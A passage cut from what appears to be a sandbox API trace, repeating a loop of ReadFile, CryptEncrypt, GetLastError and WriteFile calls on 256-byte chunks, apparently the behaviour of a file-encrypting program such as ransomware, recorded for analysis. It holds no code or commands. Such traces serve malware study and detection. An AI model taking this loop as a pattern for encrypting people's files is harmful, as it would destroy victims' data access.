lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.957] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.957] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.957] GetLastError () returned 0x0 [0144.957] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.957] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.957] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.957] GetLastError () returned 0x0 [0144.957] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.957] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.957] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.957] GetLastError () returned 0x0 [0144.957] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.957] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.957] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.957] GetLastError () returned 0x0 [0144.957] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.958] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.958] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.958] GetLastError () returned 0x0 [0144.958] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.958] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.958] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.958] GetLastError () returned 0x0 [0144.958] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.958] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.958] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.958] GetLastError () returned 0x0 [0144.958] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.958] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.958] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.958] GetLastError () returned 0x0 [0144.958] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.958] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.958] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.958] GetLastError () returned 0x0 [0144.959] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.959] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.959] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.959] GetLastError () returned 0x0 [0144.959] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.959] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.959] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.959] GetLastError () returned 0x0 [0144.959] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.959] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.959] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.959] GetLastError () returned 0x0 [0144.959] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.959] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.959] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.959] GetLastError () returned 0x0 [0144.959] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.959] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.959] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.960] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.960] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.960] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.960] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.960] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.960] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.960] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.960] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.960] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.960] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.960] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.960] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.960] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.960] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.960] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.960] GetLastError () returned 0x0 [0144.961] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.961] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.961] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.961] GetLastError () returned 0x0 [0144.961] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.961] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.961] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.961] GetLastError () returned 0x0 [0144.961] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.961] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.961] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.961] GetLastError () returned 0x0 [0144.961] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.961] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.961] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.962] GetLastError () returned 0x0 [0144.962] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.962] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.962] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.962] GetLastError () returned 0x0 [0144.962] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.962] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.962] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.962] GetLastError () returned 0x0 [0144.962] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.962] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.962] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.962] GetLastError () returned 0x0 [0144.962] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.962] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.962] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.962] GetLastError () returned 0x0 [0144.962] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.962] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.962] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.963] GetLastError () returned 0x0 [0144.963] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.963] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.963] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.963] GetLastError () returned 0x0 [0144.963] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.963] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.963] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.963] GetLastError () returned 0x0 [0144.963] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.963] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.963] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.963] GetLastError () returned 0x0 [0144.963] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.963] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.963] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.963] GetLastError () returned 0x0 [0144.963] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.963] ReadFile (in: 